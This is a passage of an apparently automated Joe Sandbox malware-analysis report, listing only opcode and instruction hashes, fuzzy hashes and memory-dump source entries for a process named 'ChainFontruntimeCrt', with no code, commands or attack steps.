                                                                                                                        • Instruction ID: 1f5c913eee22947cd0fe33a679b2582153efbdf8e0c3f52e0cfe3d215146bc7f
                                                                                                                        • Opcode Fuzzy Hash: ca885bd41365281ada984f0d653f97436f12d6986dc24ab4edb639d94c4cb0b4
                                                                                                                        • Instruction Fuzzy Hash: 88213070B1990A8BDB68DF98D4619ADF3A1FF58314F118179D41EC36D6CF24B912CB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 938ca86d5eecb59a886ab23e222cd6b8a26304b057d85c5ab5799824f12e9b76
                                                                                                                        • Instruction ID: 6aa3ac789467318b7d4589c6ff092d01141de5af73e65689ed3dea364ffbb2c4
                                                                                                                        • Opcode Fuzzy Hash: 938ca86d5eecb59a886ab23e222cd6b8a26304b057d85c5ab5799824f12e9b76
                                                                                                                        • Instruction Fuzzy Hash: 95214B5261EACA0FD796977848749A1BBA0FF5221470944FBD099CB1E7DD187809C3C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b369472ac2a556d10d6e9b59f1e3478f369e302666eb55834c196300c9bd0ad5
                                                                                                                        • Instruction ID: f7563416b43be7417a3a2701dcc65a721383a4b204980f34e6f022485a535e38
                                                                                                                        • Opcode Fuzzy Hash: b369472ac2a556d10d6e9b59f1e3478f369e302666eb55834c196300c9bd0ad5
                                                                                                                        • Instruction Fuzzy Hash: 1621F836F0D3594EE712E7A898250EC7B70EFC1265F5583B3D04D8A1E2D9382A4AC791
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61a736bb166905a0360ffa0a543967dd68f72ba7e61b12b0e15331dbea574fe7
                                                                                                                        • Instruction ID: 60709b1e0924977edd18dc907cb85af9dd4705347bf63ac4a5717d9336617cf1
                                                                                                                        • Opcode Fuzzy Hash: 61a736bb166905a0360ffa0a543967dd68f72ba7e61b12b0e15331dbea574fe7
                                                                                                                        • Instruction Fuzzy Hash: 58310930E1990D9FDFA8EB58C465AADB7B1FB68304F0141BDD05EE32A1CE35AA41CB41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 79932515c52ed0b97948cf0c8d9b12b7e6f19a46041bc36bd6d00ddd8b66dabf
                                                                                                                        • Instruction ID: 7e97be667c4c1e9b918ecb1d78ede10ebcc77a0f12964dad9cb405306b9383ff
                                                                                                                        • Opcode Fuzzy Hash: 79932515c52ed0b97948cf0c8d9b12b7e6f19a46041bc36bd6d00ddd8b66dabf
                                                                                                                        • Instruction Fuzzy Hash: F1210A31E1591D8FDF98DB58C465AEDB7B1FF5C304F1101AAD00EE32A1CA35AA81CB41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f8d6aa724a01fe6cf7f4a1af0b497bee7c54bd512d420aed76f42170c9b1b0f0
                                                                                                                        • Instruction ID: 772a345d69988a2c97b401c9ea9133a56dc3c878653a6aefc270037f62643d4f
                                                                                                                        • Opcode Fuzzy Hash: f8d6aa724a01fe6cf7f4a1af0b497bee7c54bd512d420aed76f42170c9b1b0f0
                                                                                                                        • Instruction Fuzzy Hash: 06216971B1990A9BDB58DB98D4A19A8F3A1FF58300B118139D41ED36A2CF34B912CBC1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 20dec677e550816c964a90edce15b60df9bfa6b2003e6bc7d912838622dea543
                                                                                                                        • Instruction ID: aeb7a331117ef6cf15d974f974d6b12ed4a15ed8d57729fd2c9fd79f4438867f
                                                                                                                        • Opcode Fuzzy Hash: 20dec677e550816c964a90edce15b60df9bfa6b2003e6bc7d912838622dea543
                                                                                                                        • Instruction Fuzzy Hash: 31212430A18A1D8FDB68EB54C4A4BA973E1EB98355F1107B9D00ED36B1CE34AE85CB44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac8b767f33e4cea83a5f023a3e2c32ac3c5f6a50c7c6e789741bb2676628215c
                                                                                                                        • Instruction ID: 5bb7ce5373799d24b3a6dd67ed2fedb68d4db98933bdf6bcc4cdd6f306aef77f
                                                                                                                        • Opcode Fuzzy Hash: ac8b767f33e4cea83a5f023a3e2c32ac3c5f6a50c7c6e789741bb2676628215c
                                                                                                                        • Instruction Fuzzy Hash: 1611A221F0DA1D4EE7B4A75888647FC7291EFC4350F5313BAD44ED31B2DD286A458750
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 07ea3a5f35291144b3bba1a1552182e63ab98184548430174b460275453cff03
                                                                                                                        • Instruction ID: c5d540e83d36936efb72a52323d53629607a4bce59734beff5244bf8ba2d6928
                                                                                                                        • Opcode Fuzzy Hash: 07ea3a5f35291144b3bba1a1552182e63ab98184548430174b460275453cff03
                                                                                                                        • Instruction Fuzzy Hash: 6621A461B1F2CA8BE37B56A458345B97E503F42628F2A01FAE5899A0F3DD8C164593C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d99f167f1a6db857b9eece19f53ae6dfe44d33bc454d3e08df04269620fff8f
                                                                                                                        • Instruction ID: 3b98245cadb2f231e9f4fbb26f5dfb557390eca6fbf289c91ab0a8fde579e305
                                                                                                                        • Opcode Fuzzy Hash: 0d99f167f1a6db857b9eece19f53ae6dfe44d33bc454d3e08df04269620fff8f
                                                                                                                        • Instruction Fuzzy Hash: F211EB20A1E46E4EF638864484705BD7391FFD8305B1645BEC45F875FACA38FA8297C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 46a7761068eeb3829cbd8d033bd11446cfbf9744c9b46fb4394e171fb719c4e9
                                                                                                                        • Instruction ID: 0440cab7b6bf4d7bc25c5c560f8c9530038846f8aa66cc82bca64e38f7758060
                                                                                                                        • Opcode Fuzzy Hash: 46a7761068eeb3829cbd8d033bd11446cfbf9744c9b46fb4394e171fb719c4e9
                                                                                                                        • Instruction Fuzzy Hash: 51110431B0E74E5FE77096E448256AE3BA5FF56300F06017AD44AD71F2CE68694583D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd2356dd521f5ba2b1ea663c9175bf94def09f58ef39feff63de0c54ab9e08f1
                                                                                                                        • Instruction ID: cef75d1d9babfeaf4228babd89d5732371e936876359fd1cf355bc474db03885
                                                                                                                        • Opcode Fuzzy Hash: dd2356dd521f5ba2b1ea663c9175bf94def09f58ef39feff63de0c54ab9e08f1
                                                                                                                        • Instruction Fuzzy Hash: 8F110431B0F64E6FE73496A488696FA3BE5FF46300F060076D04DD71F2DE586945C292
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3097b7819d093e01fa582601a5ebe3a499e921c0dd044cd33ede7039e8c8b03a
                                                                                                                        • Instruction ID: 766db127ad9f3095ffe57aeb7c2ad9b7aa06f4587d140472e1885350aa1c6ddd
                                                                                                                        • Opcode Fuzzy Hash: 3097b7819d093e01fa582601a5ebe3a499e921c0dd044cd33ede7039e8c8b03a
                                                                                                                        • Instruction Fuzzy Hash: 61112E61B0D60D8BEBA8E7688874AB83392EFD4750F1713B9D44EC31B2DD28A9468610
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4c1e8aeb8bc0130f109ce838be28fb13c1dcab58fcabe87fe902a7cbff3209a
                                                                                                                        • Instruction ID: 1d62a9f674c959e5b82b58dd5c203c3a7fcfebbc468ced2b19b4badf5c91a735
                                                                                                                        • Opcode Fuzzy Hash: e4c1e8aeb8bc0130f109ce838be28fb13c1dcab58fcabe87fe902a7cbff3209a
                                                                                                                        • Instruction Fuzzy Hash: A8112B32B0F78D5FE73086A548681EA3BE5EF45310F060076D04AC72F2DE586A4583D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4236c08306c7a657e19a3a41e611d5c9c190c49ee0abae37050a871f3fc4e1de
                                                                                                                        • Instruction ID: 3f7c922c1df37eb1614602b6d48008220484bc79f01e0ea7e54b0b35f0d75271
                                                                                                                        • Opcode Fuzzy Hash: 4236c08306c7a657e19a3a41e611d5c9c190c49ee0abae37050a871f3fc4e1de
                                                                                                                        • Instruction Fuzzy Hash: 7C11016171DA898BC729DB64A4259EAB7D0FF44218B4105BED48ECB1E2CF28A5058391
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2e65b5e072d1584c8404a2999deac6dc8bd60f0433338f76786ff235e369c4c
                                                                                                                        • Instruction ID: ba299c83d0f8e3c387e13f3b848c73a7104734dde692cf33c28e4e6beb292cc1
                                                                                                                        • Opcode Fuzzy Hash: f2e65b5e072d1584c8404a2999deac6dc8bd60f0433338f76786ff235e369c4c
                                                                                                                        • Instruction Fuzzy Hash: A611E335B0D74D8EE712DBA888201DC7BB0EF81651F4646B7C048CB1E2D9341A49C790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b2967b6de9d2511aa37daf084eaa9949828eebab7dea0918f113a557cad6671
                                                                                                                        • Instruction ID: 2d99e5e6d9962b54734d6970703db2957d71425f130acc551037919a1b342853
                                                                                                                        • Opcode Fuzzy Hash: 8b2967b6de9d2511aa37daf084eaa9949828eebab7dea0918f113a557cad6671
                                                                                                                        • Instruction Fuzzy Hash: 4E11E721728A494FDB65DB65A061AEEB390FF44314F400679D44EC71E3CF29A5058781
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        • Opcode Fuzzy Hash: ceacc6a1d2969a0ed113f2c93ff53337976e7b89bff1e6c6e49c18ff442bac7c
                                                                                                                        • Instruction Fuzzy Hash: 8DF0963144F2C99FD7229BB088614E97FA4AF43214F1940FAE446CB0F2D56C171AD762
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6af18d519309fa4ac7df8e1e70f91c0dfe4245268e179a427ab31b826f0b4f1
                                                                                                                        • Instruction ID: 362a4984c5a226499758cc8378b46ee8ff83162ce2da17dc25b07a91074b4dd3
                                                                                                                        • Opcode Fuzzy Hash: b6af18d519309fa4ac7df8e1e70f91c0dfe4245268e179a427ab31b826f0b4f1
                                                                                                                        • Instruction Fuzzy Hash: EBF0963154E3C99FD322DBB0C8218E53FB4AF47214B2600F6E445CB0B2D56C571AC752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                                                                        • Instruction ID: d6e7e0e91077c5b0df9496bc35fff18d38750f4fd0a92f42b71051129a602261
                                                                                                                        • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                                                                        • Instruction Fuzzy Hash: B6010474A1992C8FDFA8DB48C854FA8B7B1FB68305F1041D9800DE36A0CB719A84CF41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 77b38030535d79f956eb93a92873d18ff117e95818826e88958fd7caf39311ee
                                                                                                                        • Instruction ID: 29360c8619621cdb990a2f40faf68843e5c6fc4b3bc0a84ee0c7352782a6c1aa
                                                                                                                        • Opcode Fuzzy Hash: 77b38030535d79f956eb93a92873d18ff117e95818826e88958fd7caf39311ee
                                                                                                                        • Instruction Fuzzy Hash: CDF09621B0D60D4BEAB4E644C864BB83392EFC4355F1313B9D44EC31B2DD286A868510
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 663585fd4f8ffebae59cf5f245eb41528352dc3d46f7425ee9498fcaa94c02cd
                                                                                                                        • Instruction ID: 6f252ac22bab6003d57c12bef34e2a6abadd6c01bbb0ecaea0be0eb3dda3e39b
                                                                                                                        • Opcode Fuzzy Hash: 663585fd4f8ffebae59cf5f245eb41528352dc3d46f7425ee9498fcaa94c02cd
                                                                                                                        • Instruction Fuzzy Hash: 5CF08261B1ED4E8EFB35599478312B92A10FF41318F26007AC94E861F6CA19A702A3D3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                                                                        • Instruction ID: 378757b219dcafe17c7169d26e0421f482686a2474ed2937262bc679545b8f89
                                                                                                                        • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                                                                        • Instruction Fuzzy Hash: FBD0A73061954E4FEA01F778D8899547B90EF5F210BDA14E1D008C7171D5048955CB00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e3c3a20fbeb3818bbd06dc5cdc9e3ab4d85a0700c0ff0f2f0c0adaf4beb1ec3
                                                                                                                        • Instruction ID: 887b5515a8ed0ca55acd25ae0fef0614d55ee45b156f4194fbef04dc650532a3
                                                                                                                        • Opcode Fuzzy Hash: 0e3c3a20fbeb3818bbd06dc5cdc9e3ab4d85a0700c0ff0f2f0c0adaf4beb1ec3
                                                                                                                        • Instruction Fuzzy Hash: 69D02B41F0E38E0BF73505F0087103C19809F17344B071176D14A892F3DCC8690163A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4fda24def7547b8f86966095fefb770cf97bef7aeab9d28c300466b6573a38eb
                                                                                                                        • Instruction ID: 9997314a3f281f54a77011e0b49a060d8f75f13536d0a6dfb5ada08d7dbd0a16
                                                                                                                        • Opcode Fuzzy Hash: 4fda24def7547b8f86966095fefb770cf97bef7aeab9d28c300466b6573a38eb
                                                                                                                        • Instruction Fuzzy Hash: 30D05B42F4F38E5BE73605E049754B81AC49F573447470476D155892F3D9886A449363
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 764234fe5b416fbd79743897ff2d123f4faa9f46bf3fea585e5097da6b4c50b3
                                                                                                                        • Instruction ID: d058521dc69913cabb88b98574debf7175bc7b61eaa8dda6c0205466a83765b9
                                                                                                                        • Opcode Fuzzy Hash: 764234fe5b416fbd79743897ff2d123f4faa9f46bf3fea585e5097da6b4c50b3
                                                                                                                        • Instruction Fuzzy Hash: 34D05B83F1F7CA1BEB3605A108750640B946F1734470B04B5D1478A3F3DC883B0543A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 019da93b2df27518548db9b55e9e9aa204c9959e667c970efe97f9235080dc16
                                                                                                                        • Instruction ID: ecd9ad8d82530becad0801c3f83ab09ac2e8cdd28a5fb5f12ada5059cbcbfaef
                                                                                                                        • Opcode Fuzzy Hash: 019da93b2df27518548db9b55e9e9aa204c9959e667c970efe97f9235080dc16
                                                                                                                        • Instruction Fuzzy Hash: F1C08C04F0B70F00F83035EE14360ACB1009BC4A90FD32372C00E400F19C0E22CD814A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                                                                        • Instruction ID: 139fe28c14f4a20228704eb81ccb99aed2a3b17b8865ce8d91ab3bce1d9df8f6
                                                                                                                        • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                                                                        • Instruction Fuzzy Hash: 0EC08C305118088FCA00EB2CC884A0036A0FB0E210BC30290E00DC7170E21ADC84C700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb3fb26588337ea5b06e2053518f9ffafbe25df1786e3f2ae4e68c2d5c73d5fd
                                                                                                                        • Instruction ID: 207ad6074ed041447629969215b9f626c85e88611dfffe9a7d1e620d03f1c1f2
                                                                                                                        • Opcode Fuzzy Hash: cb3fb26588337ea5b06e2053518f9ffafbe25df1786e3f2ae4e68c2d5c73d5fd
                                                                                                                        • Instruction Fuzzy Hash: 28C08C3061180C8FCA08EB38C88480433A0FF09200BC20190E408C7170D619DCC5CB40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c46bc6eb28f12049a0d14629c5b8016acc92047b6a18febb169eeafeeaeb384c
                                                                                                                        • Instruction ID: a964a5d0d37cff3ffd8900771094fbbbf89324dfa9fd4e072b5fd1eb6dd1027b
                                                                                                                        • Opcode Fuzzy Hash: c46bc6eb28f12049a0d14629c5b8016acc92047b6a18febb169eeafeeaeb384c
                                                                                                                        • Instruction Fuzzy Hash: DBD09210B0E54F89F23B56D1413023A51A16F45709FAA0039D05F41AF18E1CB60162A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c0faf6f761710772d70c66a14b131621bc7811e5901c7fa68584305191cf8248
                                                                                                                        • Instruction ID: 6d0c7d341adb06ca713cbe8542618d6a6c64a5e15a4d54a2bb5f76e7f3b1f391
                                                                                                                        • Opcode Fuzzy Hash: c0faf6f761710772d70c66a14b131621bc7811e5901c7fa68584305191cf8248
